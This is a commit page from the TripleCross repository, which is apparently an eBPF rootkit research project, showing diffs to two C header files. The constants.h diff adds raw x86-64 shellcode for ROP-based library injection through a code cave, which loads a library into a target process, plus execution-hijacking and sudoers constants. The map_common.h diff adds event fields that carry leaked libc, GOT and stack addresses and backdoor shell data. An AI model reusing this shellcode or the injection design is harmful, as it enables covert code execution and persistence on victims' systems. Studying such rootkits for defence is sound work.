admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-26 11:23:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Merged master and develop, now all changes together. Fully tested and working.

Browse Source
This commit is contained in:
h3xduck
2022-05-15 20:46:35 -04:00
parent 57f3edd8fa aca4cc4cfb
commit 4a292f0f7a
80 changed files with 15780 additions and 48 deletions
Download Patch File Download Diff File Expand all files Collapse all files

29
src/common/constants.h
View File

@@ -19,9 +19,36 @@
#define STRING_FS_SUDOERS_ENTRY_LEN 37
//EXECUTION HIJACKING
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijackdeactivated\0"
#define EXEC_HIJACK_ACTIVE_TEMP 0
//LIBRARY INJECTION WITH ROP
#define TASK_COMM_NAME_ROP_TARGET "simple_timer"
#define CODE_CAVE_ADDRESS_STATIC 0x0000000000402e95
#define CODE_CAVE_SHELLCODE_ASSEMBLE_1 \
"\x55\x50\x51\x52\x53\x57\x56\
\xbf\x00\x20\x00\x00\x48\xbb"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_1_LEN 14
#define CODE_CAVE_SHELLCODE_ASSEMBLE_2 \
"\xff\xd3\x48\x89\xc3\xc7\x00\x2f\x68\x6f\x6d\
\xc7\x40\x04\x65\x2f\x6f\x73\xc7\x40\x08\x62\x6f\x78\
\x65\xc7\x40\x0c\x73\x2f\x54\x46\xc7\x40\x10\x47\x2f\
\x73\x72\xc7\x40\x14\x63\x2f\x68\x65\xc7\x40\x18\x6c\
\x70\x65\x72\xc7\x40\x1c\x73\x2f\x69\x6e\xc7\x40\x20\
\x6a\x65\x63\x74\xc7\x40\x24\x69\x6f\x6e\x5f\xc7\x40\
\x28\x6c\x69\x62\x2e\xc7\x40\x2c\x73\x6f\x00\x00\x48\
\xb8"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_2_LEN 90
#define CODE_CAVE_SHELLCODE_ASSEMBLE_3 \
"\xbe\x01\x00\x00\x00\x48\x89\xdf\
\x48\x81\xec\x00\x10\x00\x00\xff\
\xd0\x48\x81\xc4\x00\x10\x00\x00\x5e\
\x5f\x5b\x5a\x59\x58\x5d\xff\x25\x00\x00\x00\x00"
#define CODE_CAVE_SHELLCODE_ASSEMBLE_3_LEN 37
#define TASK_COMM_NAME_RESTRICT_HIJACK "bash"
#define TASK_COMM_RESTRICT_HIJACK_ACTIVE 1

11
src/common/map_common.h
View File

@@ -11,7 +11,8 @@ typedef enum {
EXIT,
ERROR,
COMMAND,
PSH_UPDATE
PSH_UPDATE,
VULN_SYSCALL
} event_type_t;
struct rb_event {
@@ -19,6 +20,14 @@ struct rb_event {
char message[RB_EVENT_MAX_MESSAGE_SIZE];
int code;
struct backdoor_phantom_shell_data bps_data;
__u64 syscall_address;
__u64 process_stack_return_address;
__u64 libc_main_address;
__u64 libc_dlopen_mode_address;
__u64 libc_malloc_address;
__u64 got_address;
__s32 got_offset;
int relro_active;
event_type_t event_type;
__u32 client_ip;
__u16 client_port;